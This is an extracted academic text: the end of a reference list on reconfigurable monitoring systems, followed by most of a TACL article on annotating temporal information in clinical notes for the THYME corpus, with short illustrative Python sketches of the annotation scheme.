chakravarthi mk, tiwari rk, handa s. . accelerometer based static gesture recog- nition and mobile monitoring system using neural networks. procedia computer science : – doi . /j.procs. . . . cong j, liu b, neuendorffer s, noguera j, vissers k, zhang z. . high-level synthesis for fpgas: from prototyping to deployment. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . cong j, minkovich k. . optimality study of logic synthesis for lut-based fpgas. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . dovžan d, logar v, Škrjanc i. . implementation of an evolving fuzzy model (efumo) in a monitoring system for a waste-water treatment process. ieee trans- actions on fuzzy systems : – doi . /tfuzz. . . eissa m, elmesalawy mm, hadhoud mm. . wide area monitoring system based on the third generation universal mobile telecommunication system (umts) for event identification. international journal of electrical power & energy systems : – doi . /j.ijepes. . . . fu h. . equalization for high-speed serial interfaces in xilinx series fpga transceivers. xilinx white paper. : available at https://www.xilinx.com/support/ documentation/white_papers/wp - series-xcvr-equalization.pdf . gaikwad n, mistry y. . review on environment monitoring system and energy efficiency. international journal of engineering research and applications : – . ge z, song z, gao f. . review of recent research on data-based process monitoring. industrial & engineering chemistry research : – doi . /ie q. koetter f, kochanowski m. . a model-driven approach for event-based business process monitoring. information systems and e-business management : – doi . /s - - - . korableva o, kalimullina o, kurbanova e. . building the monitoring systems for complex distributed systems: problems and solutions. iceis : – . kumar a, kim h, hancke gp. . environmental monitoring systems: a review. ieee sensors journal : – . lyke jc, christodoulou cg, vera ga, edwards ah. . an introduction to reconfig- urable systems. proceedings of the ieee : – doi . /jproc. . . lysecky r, vahid f, tan sx-d. . dynamic fpga routing for just-in-time fpga compilation. in: proceedings of the st annual design automation conference. acm, – . maksymyuk t, dumych s, brych m, satria d, jo m. . an iot based monitoring framework for software defined g mobile networks. in: proceedings of the th tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /j.ijepes. . . https://www.xilinx.com/support/documentation/white_papers/wp - series-xcvr-equalization.pdf https://www.xilinx.com/support/documentation/white_papers/wp - series-xcvr-equalization.pdf http://dx.doi.org/ . /ie q http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /peerj-cs. international conference on ubiquitous information management and communication. – . morgan j, o’donell g. . a service-oriented reconfigurable process monitoring system-enabling cyber physical systems. journal of machine engineering : – . morgan j, o’donnell ge. . cyber physical process monitoring systems. journal of intelligent manufacturing : – doi . /s - - -z. mukhopadhyay sc. . wearable sensors for human activity monitoring: a review. ieee sensors journal : – doi . /jsen. . . myint cz, gopal l, aung yl. . 
reconfigurable smart water quality monitoring system in iot environment. in: ieee/acis th international conference on computer and information science (icis). piscataway: ieee, – . osipov vy, vodyaho ai, zhukova na, glebovsky pa. . multilevel automatic synthesis of behavioral programs for smart devices. in: international conference on control, artificial intelligence, robotics & optimization (iccairo). ieee, – . osipov vy. . automatic synthesis of action programs for intelligent robots. pro- gramming & computer software ( ): – doi . /s . raju krsr, varma ghk. . knowledge based real time monitoring system for aquaculture using iot. in: ieee th international advance computing conference (iacc). piscataway: ieee, – . rubin r, dehon a. . choose-your-own-adventure routing: lightweight load-time defect avoidance. acm transactions on reconfigurable technology and systems (trets) ( ): – doi . / . . sakhardande p, hanagal s, kulkarni s. . design of disaster management system using iot based interconnected network with smart city monitoring. in: international conference on internet of things and applications (iota). piscataway: ieee, – . shichkina y, kataeva g, irishina y, stanevich e. . the architecture of the system for monitoring the status in patients with parkinson’s disease using mobile technologies. studies in computational intelligence : – . silva n, marques er, lopes lm. . flux: a platform for dynamically reconfigurable mobile crowd-sensing. acm transactions on sensor networks (tosn) ( – ): – doi . / . singh r, gernaey kv, gani r. . an ontological knowledge-based system for the selection of process monitoring and analysis tools. computers & chemical engineering : – doi . /j.compchemeng. . . . sohn h, farrar cr, hemez fm, shunk dd, stinemates dw, nadler br, czarnecki jj. . a review of structural health monitoring literature: – . usa: los alamos national laboratory. stefanov k, voevodin v, zhumatiy s, voevodin v. . dynamically reconfigurable distributed modular monitoring system for supercomputers (dimmon). procedia computer science : – doi . /j.procs. . . . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /s http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /j.compchemeng. . . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /peerj-cs. suma n, samson sr, saranya s, shanmugapriya g, subhashri r. . iot based smart agriculture monitoring system. international journal on recent and innovation trends in computing and communication : – . thompson a. . hardware evolution: automatic design of electronic circuits in reconfig- urable hardware by artificial evolution. london: springer science & business media doi . / - - - - . yang z, zhou q, lei l, zheng k, xiang w. . an iot-cloud based wearable ecg monitoring system for smart healthcare. journal of medical systems ( ): doi . /s - - - . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. uc san diego uc san diego previously published works title temporal annotation in the clinical domain. permalink https://escholarship.org/uc/item/ sk m q journal transactions of the association for computational linguistics, issn - x authors styler, william f bethard, steven finan, sean et al. publication date - - doi . 
/tacl_a_ peer reviewed escholarship.org powered by the california digital library university of california https://escholarship.org/uc/item/ sk m q https://escholarship.org/uc/item/ sk m q#author https://escholarship.org http://www.cdlib.org/ temporal annotation in the clinical domain william f. styler iv , steven bethard , sean finan , martha palmer , sameer pradhan , piet c de groen , brad erickson , timothy miller , chen lin , guergana savova and james pustejovsky department of linguistics, university of colorado at boulder department of computer and information sciences, university of alabama at birmingham children’s hospital boston informatics program and harvard medical school mayo clinic college of medicine, mayo clinic, rochester, mn department of computer science, brandeis university abstract this article discusses the requirements of a formal specification for the annotation of temporal information in clinical narratives. we discuss the implementation and extension of iso-timeml for annotating a corpus of clinical notes, known as the thyme cor- pus. to reflect the information task and the heavily inference-based reasoning demands in the domain, a new annotation guideline has been developed, “the thyme guidelines to iso-timeml (thyme-timeml)”. to clarify what relations merit annotation, we distinguish between linguistically-derived and inferentially-derived temporal orderings in the text. we also apply a top performing temp- eval system against this new resource to measure the difficulty of adapting systems to the clinical domain. the corpus is available to the community and has been proposed for use in a semeval task. introduction there is a long-standing interest in temporal reason- ing within the biomedical community (savova et al., ; hripcsak et al., ; meystre et al., ; bramsen et al., ; combi et al., ; keravnou, ; dolin, ; irvine et al., ; sullivan et al., ). this interest extends to the automatic ex- traction and interpretation of temporal information from medical texts, such as electronic discharge sum- maries and patient case summaries. making effective use of temporal information from such narratives is a crucial step in the intelligent analysis of informat- ics for medical researchers, while an awareness of temporal information (both implicit and explicit) in a text is also necessary for many data mining tasks. it has also been demonstrated that the temporal in- formation in clinical narratives can be usefully mined to provide information for some higher-level tempo- ral reasoning (zhao et al., ). robust temporal understanding of such narratives, however, has been difficult to achieve, due to the complexity of deter- mining temporal relations among events, the diver- sity of temporal expressions, and the interaction with broader computational linguistic issues. recent work on electronic health records (ehrs) points to new ways to exploit and mine the informa- tion contained therein (savova et al., ; roberts et al., ; zheng et al., ; turchin et al., ). we target two main use cases for extracted data. first, we hope to enable interactive displays and summaries of the patient’s records to the physician at the time of visit, making a comprehensive review of the patient’s history both faster and less prone to oversights. sec- ond, we hope to enable temporally-aware secondary research across large databases of medical records (e.g., “what percentage of patients who undergo pro- cedure x develop side-effect y within z months?”). 
both of these applications require the extraction of time and date associations for critical events and the relative ordering of events during the patient’s period of care, all from the various records which make up a patient’s ehr. although we have these two specific applications in mind, the schema we have developed is generalizable and could potentially be embedded in a wide variety of biomedical use cases. narrative texts in ehrs are temporally rich doc- uments that frequently contain assertions about the timing of medical events, such as visits, laboratory values, symptoms, signs, diagnoses, and procedures (bramsen et al., ; hripcsak et al., ; zhou et al., ). temporal representation and reason- ing in the medical record are difficult due to: ( ) the diversity of time expressions; ( ) the complexity of determining temporal relations among events (which are often left to inference); ( ) the difficulty of han- dling the temporal granularity of an event; and ( ) transactions of the association for computational linguistics, ( ) – . action editor: ellen riloff. submitted / ; revised / ; published / . c© association for computational linguistics. general issues in natural language processing (e.g., ambiguity, anaphora, ellipsis, conjunction). as a re- sult, the signals used for reconstructing a timeline can be both domain-specific and complex, and are often left implicit, requiring significant domain knowledge to accurately detect and interpret. in this paper, we discuss the demands on accurately annotating such temporal information in clinical notes. we describe an implementation and extension of iso-timeml (pustejovsky et al., ), devel- oped specifically for the clinical domain, which we refer to as the “thyme guidelines to iso-timeml” (“thyme-timeml”), where thyme stands for “temporal histories of your medical events”. a sim- plified version of these guidelines formed the basis for the i b medical-domain temporal relation challenge (sun et al., a). this is being developed in the context of the thyme project, whose goal is to both create ro- bust gold standards for semantic information in clini- cal notes, as well as to develop state-of-the-art algo- rithms to train and test on this dataset. deriving timelines from news text requires the con- crete realization of context-dependent assumptions about temporal intervals, orderings and organization, underlying the explicit signals marked in the text (pustejovsky and stubbs, ). deriving patient history timelines from clinical notes also involves these types of assumptions, but there are special de- mands imposed by the characteristics of the clinical narrative. due to both medical shorthand practices and general domain knowledge, many event-event relations are not signaled in the text at all, and rely on a shared understanding and common conceptual models of the progressions of medical procedures available only to readers familiar with language use in the medical community. identifying these implicit relations and temporal properties puts a heavy burden on the annotation process. as such, in the thyme-timeml guideline, considerable effort has gone into both describing and proscribing the annotation of temporal orderings that are inferable only through domain-specific temporal knowledge. 
although the thyme guidelines describe a num- ber of departures from the iso-timeml standard for expediency and ease of annotation, this paper will focus on those differences specifically motivated by the needs of the clinical domain, and on the conse- quences for systems built to extract temporal data in both the clinical and general domain. the nature of clinical documents in the thyme corpus, we have been examining , de-identified notes from a large healthcare practice (the mayo clinic), representing two distinct fields within oncology: brain cancer, and colon can- cer. to date, we have principally examined two dif- ferent general types of clinical narrative in our ehrs: clinical notes and pathology reports. clinical notes are records of physician interactions with a patient, and often include multiple, clearly delineated sections detailing different aspects of the patient’s care and present illness. these notes are fairly generic across institutions and specialities, and although some terms and inferences may be specific to a particular type of practice (such as oncology), they share a uniform structure and pattern. the ‘his- tory of present illness’, for example, summarizes the course of the patient’s chief complaint, as well as the interventions and diagnostics which have been thus far attempted. in other sections, the doctor may out- line her current plan for the patient’s treatment, then later describe the patient’s specific medical history, allergies, care directives, and so forth. most critically for temporal reasoning, each clin- ical note reflects a single time in the patient’s treat- ment history at which all of the doctor’s statements are accurate (the doctime), and each section tends to describe events of a particular timeframe. for example, ‘history of present illness’ predominantly describes events occuring before doctime, whereas ‘medications’ provides a snapshot at doctime and ‘ongoing care orders’ discusses events which have not yet occurred. clinical notes contain rich temporal information and background, moving fluidly from prior treat- ments and symptoms to present conditions to future interventions. they are also often rich with hypo- thetical statements (“if the tumor recurs, we can...”), each of which can form its own separate timeline. by constrast, pathology notes are quite different. such notes are generated by a medical pathologist although most patient information was removed, dates and temporal information were not modified according to this project’s specific data use agreement. one complication is the propensity of doctors and automated systems to later update sections in a note without changing the timestamp or metadata. we have added a sectiontime to keep these updated sections from affecting our overall timeline. upon receipt and analysis of specimens (ranging from tissue samples from biopsy to excised portions of tumor or organs). pathology notes provide crucial information to the patient’s doctor confirming the malignancy (cancer) in samples, describing surgi- cal margins (which indicate whether a tumor was completely excised), and classifying and ‘staging’ a tumor, describing the severity and spread of the can- cer. because the information in such notes pertains to samples taken at a single moment in time, they are temporally sparse, seldom referring to events before or after the examination of the specimen. 
however, they contain critical information about the state of the patient’s illness and about the cancer itself, and must be interpreted to understand the history of the patient’s illness. most importantly, in all ehrs, we must contend with the results of a fundamental tension in mod- ern medical records: hyper-detailed records provide a crucial defense against malpractice litigation, but including such detail takes enormous time, which doctors seldom have. given that these notes are writ- ten by and for medical professionals (who form a relatively insular speech community), a great many non-standard expressions, abbreviations, and assump- tions of shared knowledge are used, which are simul- taneously concise and detail-rich for others who have similar backgrounds. these time-saving devices can range from tempo- rally loaded acronyms (e.g., ‘qid’, latin for quater in die, ‘four times daily’), to assumed orderings (a diag- nostic test for a disorder is assumed to come before the procedure which treats it), and even to completely implicit events and temporal details. for example, consider the sentence in ( ). ( ) colonoscopy / / , nodule biopsies negative we must understand that during the colonoscopy, the doctor obtained biopsies of nodules, which were packaged and sent to a pathologist, who reviewed them and determined them to be ‘negative’ (non- cancerous). in such documents, we must recover as much tem- poral detail as possible, even though it may be ex- pressed in a way which is not easily understood out- side of the medical community, let alone by linguists or automated systems. we must also be aware of the legal relevance of some events (e.g., “we discussed the possible side effects”), even when they may not seem relevant to the patient’s actual care. finally, each specialty and note type has separate conventions. within colon cancer notes, the amer- ican joint committee on cancer (ajcc) staging codes (e.g., t n , indicating the nature of the tumor, lymph node and metastasis involvement) are metic- ulously recorded, but are largely absent in the brain cancer notes which make up the second corpus in our project. so, although clinical notes share many similarities, annotators without sufficient domain ex- pertise may require additional training to adapt to the inferences and nuances of a new clinical subdomain. interpreting ‘event’ and temporal expressions in the clinical domain much prior work has been done on standardizing the annotation of events and temporal expressions in text. the most widely used approach is the iso- timeml specification (pustejovsky et al., ), an iso standard that provides a common framework for annotating and analyzing time, events, and event rela- tions. as defined by iso-timeml, an event refers to anything that can be said “to obtain or hold true, to happen or to occur”. this is a broad notion of event, consistent with bach’s use of the term “eventuality” (bach, ) as well as the notion of fluents in ai (mccarthy, ). because the goals of the thyme project involve automatically identifying the clinical timeline for a patient from clincal records, the scope of what should be admitted into the domain of events is inter- preted more broadly than in iso-timeml . within the thyme-timeml guideline, an event is any- thing relevant to the clinical timeline, i.e., anything that would show up on a detailed timeline of the pa- tient’s care or life. the best single-word syntactic head for the event is then used as its span. 
for example, a diagnosis would certainly appear on such a timeline, as would a tumor, illness, or procedure. on the other hand, entities that persist throughout the relevant temporal period of the clinical timeline (endurants in ontological circles) would not be con- sidered as event-like. this includes the patient, other humans mentioned (the patient’s mother-in-law or the doctor), organizations (the emergency room), non-anatomical objects (the patient’s car), or indi- vidual parts of the patient’s anatomy (an arm is not an event unless missing or otherwise notable). to meet our explicit goals, the thyme-timeml guideline introduces two additional levels of interpre- our use of the term ‘event’ corresponds with the less specific iso-timeml term ‘eventuality’ tation beyond that specified by iso-timeml: (i) a well-defined task; and (ii) a clearly identified domain. by focusing on the creation of a clinical timeline from clinical narrative, the guideline imposes con- straints that cannot be assumed for a broadly defined and domain independent annotation schema. some events annotated under our guideline are considered meaningful and eventive mostly by virtue of a specific clinical or legal value. for example, ajcc staging codes (discussed in section ) are eventive only in the sense of the code being assigned to a tumor at a given moment in the patient’s care. however, they are of such critical importance and informative value to doctors that we have chosen to annotate them specifically so that they will show up on the patient’s timeline in a clinical setting. similarly, because of legal pressures to establish in- formed consent and patient knowledge of risk, entire paragraphs of clinical notes are dedicated to docu- menting the doctor’s discussion of risks, plans, and alternative strategies. as such, we annotate verbs of discussion (“we talked about the risks of this drug”), consent (“she agreed with the current plan”), and comprehension (“mrs. larsen repeated the potential side effects back to me”), even though they are more relevant to legal defense than medical treatment. it is also because of this grounding in clinical lan- guage that entities and other non-events are often interpreted in terms of their associated eventive prop- erties. there are two major types for which this is a significant shift in semantic interpretation: ( ) a medication as event: orders: lariam twice daily. b disorder as event: tumor of the left lung. in both these cases, entities which are not typically marked as events are identified as such, because they contribute significant information to the clinical time- line being constructed. in ( a), for example, the timex “twice daily” is interpreted as scoping over the eventuality of the patient taking the medication, not the prescription event. in sentence ( b), the “tu- mor” is interpreted as a stative eventuality of the patient having a tumor located within an anatomical region, rather than an entity within an entity. within the medical domain, these eventive inter- pretations of medications, growths and status codes are unambiguous and consistent. doctors in clini- cal notes (unlike in biomedical research texts) do not discuss medications without an associated (im- plicit) administering event (though some mentions may be hypothetical, generic or negated). similarly, mentions of symptoms or disorders reflect occur- rences in a patient’s life, rather than abstract entities. 
with these interpretations in mind, we can safely in- fer, for instance, that all umls (unified medical language system, (bodenreider, )) entities of the types disorder, chemical/drug, procedure and sign/symptom will be events. in general, in the medical domain, it is essential to read “between the lines” of the shorthand expressions used by the doctors, and recognize implicit events that are being referred to by specific anatomical sites or medications. modifications to iso-timeml for the clinical domain overall, we have found that the specification required for temporal annotation in the clinical domain does not require substantial modification from existing specifications for the general domain. the clinical domain includes no shortage of inferences, short- hands, and unusual use of language, but the structure of the underlying timeline is not unique. as a result of this, we have been able to adopt most of the framework from iso-timeml, adapting the guidelines where needed, as well as reframing the focus of what gets annotated. this is reflected in a comprehensive guideline, incorporating the specific patterns and uses of events and temporal expressions as seen in clinical data. this approach allows the resulting annotations to be interoperable with exist- ing solutions, while still accommodating the major differences in the nature of the texts. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org our extensions of the iso-timeml specification to the clinical domain are intended to address specific constructions, meanings, and phenomena in medical texts. our schema differs from iso-timeml in a few notable ways. event properties we have both simplified the iso-timeml coding of events, and extended it to meet the needs of the clinical domain and the specific language goals of the clinical narrative. access to the corpus will require a data use agreement. more information about this process is available from the corpus website. consider, for example, how modal subordination is handled in iso-timeml. this involves the semantic characterization of an event as “likely”, “possible”, or as presented by observation, evidence, or hearsay. all of these are accounted for compositionally in iso- timeml within the slink (subordinating link) relation (pustejovsky et al., ). while accept- ing iso-timeml’s definition of event modality, we have simplified the annotation task within the cur- rent guideline, so that events now carry attributes for “contextual modality”, “contextual aspect” and “permanence”. contextual modality allows the values actual, hypothetical, hedged, and generic. actual covers events which have actually happened, e.g., “we’ve noted a tumor”. hypothetical covers con- ditionals and possibilities, e.g., “if she develops a tumor”. hedged is for situations where doctors proffer a diagnosis, but do so cautiously, to avoid legal liability for an incorrect diagnosis or for over- looking a correct one. for example: ( ) a. the signal in the mri is not inconsistent with a tumor in the spleen. b. the rash appears to be measles, awaiting antibody test to confirm. these hedged events are more real than a hypo- thetical diagnosis, and likely merit inclusion on a timeline as part of the diagnostic history, but must not be conflated with confirmed fact. these (and other forms of uncertainty in the medical domain) are discussed extensively in (vincze et al., ). 
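as a small illustration of how the contextual modality attribute could be carried on an event annotation, the python sketch below uses the guideline's terminology but is not the thyme annotation format itself; the class and field names are assumptions made for illustration.

from dataclasses import dataclass

# illustrative sketch of an event annotation carrying the contextual modality
# attribute; this is not the actual thyme storage format
@dataclass
class clinicalevent:
    text: str                  # the single-word syntactic head, e.g. "tumor"
    contextual_modality: str   # one of: actual, hypothetical, hedged, generic

# "we've noted a tumor" -> an actual event
tumor = clinicalevent(text="tumor", contextual_modality="actual")

# "the rash appears to be measles, awaiting antibody test to confirm" -> hedged
measles = clinicalevent(text="measles", contextual_modality="hedged")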
in contrast, generic events do not refer to the pa- tient’s illness or treatment, but instead discuss illness or treatment in general (often in the patient’s specific demographic). for example: ( ) in other patients without significant comor- bidity that can tolerate adjuvant chemother- apy, there is a benefit to systemic adjuvant chemotherapy. these sections would be true if pasted into any pa- tient’s note, and are often identical chunks of text repeatedly used to justify a course of action or treat- ment as well as to defend against liability. contextual aspect (to distinguish from grammati- cal aspect), allows the clinically-necessary category, intermittent. this serves to distinguish intermit- tent events (such as vomiting or seizures) from constant, more stative events (such as fever or sore- ness). for example, the bolded event in ( a) would be marked as intermittent, while that in ( b) would not: ( ) a she has been vomiting since june. b she has had swelling since june. in the first case, we assume that her vomiting has been intermittent, i.e., there were several points since june in which she was not actively vomiting. in the second case, unless made otherwise explicit (“she has had occasional swelling”), we assume that swelling was a constant state. this property is also used when a particular instance of an event is intermittent, even though it generally would not be: ( ) since starting her new regime, she has had occa- sional bouts of fever, but is feeling much better. the permanence attribute has two values, finite and permanent. permanence is a property of dis- eases themselves, roughly corresponding to the med- ical concept of “chronic” vs. “acute” disease, which marks whether a disease is persistent following diag- nosis. for example, a (currently) uncurable disease like multiple sclerosis would be classed as perma- nent, and thus, once mentioned in a patient’s note, will be assumed to persist through the end of the patient’s timeline. this is compared with finite disorders like “influenza” or “fever”, which, if not mentioned in subsequent notes, should be considered cured and no longer belongs on the patient’s time- line. because it requires domain-specific knowledge, although present in the specification, permanence is not currently annotated. however, annotators are trained on the basic idea and told about subsequent axiomatic assignment. the addition of this property to our schema is designed to relieve annotators of any feeling of obligation to express this inferred informa- tion in some other way. timex types temporal expressions (timex s) in the clinical domain function the same as in the gen- eral linguistic community, with two notable excep- tions. iso-timeml sets (statements of frequency) occur quite frequently in the medical domain, par- ticularly with regard to medications and treatments. medication sections within notes often contain long lists of medications, each with a particular associated set (“claritin mg twice daily”), and further tempo- ral specification is not uncommon (e.g., “three times per day at meals”, “once a week at bedtime”). the second major change for the medical domain is a new type of timex which we call prepos- texp. this covers temporally complex terms like “preoperative”, “postoperative”, and “intraoperative”. these temporal expressions designate a span of time bordered, usually only on one side, by the incorpo- rated event (an operation, in the previous events). 
in many cases, the referent is clear: ( ) she underwent hemicolectomy last week, and had some postoperative bleeding. here we understand that “postoperative” refers to “the period of time following the hemicolectomy”. in these cases, the prepostexp makes explicit a tempo- ral link between the bleeding and the hemicolectomy. in other cases, no clear referent is present: ( ) patient shows some post-procedure scarring. in these situations, where no procedure is mentioned (or the reference is never explicitly resolved), we treat the prepostexp as a narrative container (see section ), covering the span of time following the unnamed procedure. finally, it is worth noting that the process of nor- malizing those timex s is significantly more com- plex relative to the general domain, because many temporal expressions are anchored not to dates or times, but to other events (whose dates are often not mentioned or not known by the physician). as we move towards a complete system, we are working to expand the iso-timeml system for timex nor- malization to allow some value to be assigned to a phrase like “in the months after her hemicolectomy” when no referent date is present. iso-timeml, in discussion with iso tc sc , plans to reference to such timex s in a future release of the standard. temporal ordering and narrative containers the semantic content and informational impact of a timeline is encoded in the ordering relations that are identified between the temporal and event expres- sions present in clinical notes. iso-timeml speci- fies the standard thirteen “allen relations” from the interval calculus (allen, ), which it refers to as tlink values. for unguided, general-purpose annota- tion, the number of relations that could be annotated grows quadratically with the number of events and times, and the task quickly becomes unmanageable. there are, however, strategies that we can adopt to make this labeling task more tractable. temporal ordering relations in text are of three kinds: . relations between two events . relations between two times . relations between a time and an event. iso-timeml, as a formal specification of the tem- poral information conveyed in language, makes no distinction between these ordering types. humans, however, do make distinctions, based on local tempo- ral markers and the discourse relations established in a narrative (miltsakaki et al., ; poesio, ). because of the difficulty of humans capturing ev- ery relationship present in the note (and the disagree- ment which arises when annotators attempt to do so), it is vital that the annotation guidelines describe an approach that reduces the number of relations that must be considered, but still results in maximally in- formative temporal links. we have found that many of the weaknesses in prior annotation approaches stem from interaction between two competing goals: • the guideline should specify certain types of an- notations that should be performed; • the guideline should not force annotations to be performed when they need not be. failing in the first goal will result in under-annotation and the neglect of relations which provide necessary information for inference and analysis. failure in the second goal results in over-annotation, creating com- plex webs of temporal relations which yield mostly inferable information, but which complicate annota- tion and adjudication considerably. 
our method of addressing both goals in tempo- ral relations annotation is that of the narrative con- tainer, discussed in pustejovsky and stubbs ( ). a narrative container can be thought of as a temporal bucket into which an event or series of events may fall, or a natural cluster of events around a given time or situation. these narrative containers are often represented (or “anchored”) by dates or other temporal expressions (within which a variety of different events occur), although they can also be anchored to more abstract concepts (“recovery” which might involve a variety of events) or even durative events (many other events can occur dur- ing a surgery). rather than marking every possible tlink between each event, we instead try to link all events to their narrative containers, and then link those containers so that the contained events can be linked by inference. first, annotators assign each event to one of four broad narrative containers: before the doctime, be- fore and overlapping the doctime, just overlapping the doctime or after the doctime. this narrative container is identified by the event attribute doc- timerel. after the assignment of doctimerel, the remainder of the narrative container relations must be specified using temporal links (tlinks). there are five different temporal relations used for such tlinks: before, overlap, begins-on, ends-on and contains . due to our narrative container ap- proach, contains is the most frequent relation by a large margin. events serving as narrative container anchors are not tagged as containers per-se. instead, annotators use the narrative container idea to help them visu- alize the temporal relations within a document, and then make a series of contains tlink annotations which establish events and timex s as anchors, and specify their contents. if the annotators do their jobs correctly, properly implementing doctimerel and creating accurate tlinks, a good understanding of the narrative containers present in a document will naturally emerge from the annotated text. the major advantage introduced with narrative containers is this: a narrative event is placed within a bounding temporal interval which is explicitly men- tioned in the text. this allows events within sep- arate containers to be linked by post-hoc inference, temporal reasoning, and domain knowledge, rather than by explicit (and time-consuming) one-by-one temporal relations annotation. a secondary advantage is that this approach works nicely with the general structure of story-telling in both the general and clinical domains, and provides a compelling and useful metaphor for interpreting time- lines. often, especially in clinical histories, doctors will cluster discussions of symptoms, interventions and diagnoses around a given date (e.g. a whole para- graph starting “june :”), a specific hospitaliza- tion (“during her january stay at mercy”), or a given illness or treatment (“while she underwent chemo”). even when specific events are not explicitly or- dered within a cluster (often because the order can be easily inferred with domain knowledge), it is often quite easy to place the events into containers, and just a few tlinks can order the containers relative to one another with enough detail to create a clinically useful understanding of the overall timeline. 
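A minimal sketch of how this two-step scheme might be represented is given below: every event carries a coarse DocTimeRel bucket, and CONTAINS TLINKs anchor events to their narrative containers, from which the container groupings simply emerge. The value spellings, class names, and the example mentions (a hospital-stay anchor with two clustered events) are assumptions for illustration, not the corpus's exact inventory.

```python
from collections import defaultdict
from dataclasses import dataclass

# Coarse buckets relative to the document creation time, and the TLINK
# relation inventory described above; exact spellings are illustrative.
DOCTIMEREL_VALUES = {"BEFORE", "BEFORE/OVERLAP", "OVERLAP", "AFTER"}
TLINK_VALUES = {"BEFORE", "OVERLAP", "BEGINS-ON", "ENDS-ON", "CONTAINS"}

@dataclass
class Event:
    mention: str
    doctimerel: str  # one of DOCTIMEREL_VALUES

@dataclass
class TLink:
    source: str      # an event or timex mention acting as a container anchor
    relation: str    # one of TLINK_VALUES
    target: str

def narrative_containers(tlinks):
    """Group annotations under their container anchors.

    Anchors are never tagged as containers explicitly; they emerge as the
    sources of CONTAINS links.
    """
    grouped = defaultdict(list)
    for link in tlinks:
        if link.relation == "CONTAINS":
            grouped[link.source].append(link.target)
    return dict(grouped)

# Hypothetical note fragment: "During her January stay at Mercy she was
# given chemo and developed a rash."
events = [Event("chemo", doctimerel="BEFORE"),
          Event("rash", doctimerel="BEFORE")]
tlinks = [TLink("January stay", "CONTAINS", "chemo"),
          TLink("January stay", "CONTAINS", "rash")]
print(narrative_containers(tlinks))  # {'January stay': ['chemo', 'rash']}
```

The point of the design is that only a handful of CONTAINS links per paragraph need to be drawn by hand; the relative ordering of everything inside the containers is left to inference.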
narrative containers also allow the inference of re- lations between sub-events within nested containers: this is a subset of the iso-timeml tlink types, excluding those seldom occurring in medical records, like ‘simultaneous’ as well as inverse relations like ‘during’ or ‘after’. ( ) december th: the patient underwent an mri and ekg as well as emergency surgery. dur- ing the surgery, the patient experienced mild tachycardia, and she also bled significantly during the initial incision. . december th contains mri . december th contains ekg . december th contains surgery a. surgery contains tachycardia b. surgery contains incision c. incision contains bled through our container nesting, we can automatically infer that ‘bled’ occurred on december th (because ‘ th’ contains ‘surgery’ which contains ‘inci- sion’ which contains ‘bled’). this also allows the capture of event/sub-event relations, and the rapid expression of complex temporal interactions. explicit vs. inferable annotation given a specification language, there are essentially two ways of introducing the elements into the docu- ment (data source) being annotated: • manual annotation: elements are introduced into the document directly by the human annotator fol- lowing the guideline. • automatic (inferred) annotation: elements are cre- ated by applying an automated procedure that in- troduces new elements that are derivable from the human annotations. as such, there is a complex interaction between spec- ification and guideline, and we focus on how the clinical annotation task has helped shape and refine the annotation guidelines. it is important to note that an annotation guideline does not necessarily force the markup of certain elements in a text, even though the specification language (and the eventual goal of the project) might require those annotations to exist. in some cases, these added annotations are derived logically from human annotations. explicitly marked temporal relations can be used to infer others that are not marked but exist implicitly through closure. for instance, given events a, b and c and tlinks ‘a before b’ and ‘b before c’, the tlink ‘a be- fore c’ can be automatically inferred. repeatedly applying such inference rules allows all inferable we ignore the application of automatic techniques, such as classifiers trained on external datasets, as our focus here is on the preparation of the gold standard used for such classifiers. tlinks to be generated (verhagen, ). we can use this idea of closure to show our annotators which annotations need not be marked explicitly, saving time and effort. we have also incorporated these clo- sure rules into our inter-annotator agreement (iaa) calculation for temporal relations, described further in section . . the automatic application of rules following the annotation of the text is not limited to the marking of logically inferable relations or events. in the clinical domain, the combination of within-group shared knowledge and pressure towards concise writ- ing leads to a number of common, inferred relations. take, for example, the sentence: ( ) jan : colonoscopy, biopsies. pathology showed adenocarcinoma, resected at mercy. diagnosis t n adenocarcinoma. in this sentence, only the contains relations be- tween “jan ” and the events (in bold) are explicitly stated. 
however, based on the known progression-of-care for colon cancer, we can infer that the colonoscopy occurs first, biopsies occur dur- ing the colonoscopy, pathology happens afterwards, a diagnosis (here, adenocarcinoma) is returned after pathology, and resection of the tumor occurs after diagnosis. the presence of the ajcc staging infor- mation in the final sentence (along with the confir- mation of the adenocarcinoma diagnosis) implies a post-surgical pathology exam of the resected spec- imen, as the ajcc staging information cannot be determined without this additional examination. these inferences come naturally to domain ex- perts but are largely inaccessible to people outside the medical community without considerable anno- tator training. making explicit our understanding of these “understood orderings” is crucial; although they are not marked by human annotators in our schema, the annotators often found it initially frustrating to leave these (purely inferential) relations unstated. al- though many of our (primarily linguistically trained) annotators learned to see these patterns, we chose to exclude them from the manual task since newer an- notators with varying degrees of domain knowledge may struggle if asked to manually annotate them. similar unspoken-but-understood orderings are found throughout the clinical domain. as mentioned in section , both permanence and contextual as- pect:intermittent are properties of symptoms and dis- eases themselves, rather than of the patient’s particu- lar situation. as such, these properties could easily annotation type raw count event , timex , link total , table : raw frequency of annotation types tlink type raw count % of tlinks contains , . % overlap , . % before , . % begins-on . % ends-on . % total , . % table : relative frequency of tlink types be identified and marked across a medical ontology, and then be automatically assigned to events rec- ognized as specific medical named entities. finally, due to the peculiarities of ehr systems, some annotations must be done programatically. ex- act dates of patient visit (or of pathology/radiology consult) are often recorded as metadata on the ehr itself, rather than within the text, making the canoni- cal doctime (or time of automatic section modifi- cations) difficult to access in de-identified plaintext data, but easy to find automatically. results we report results on the annotations from the 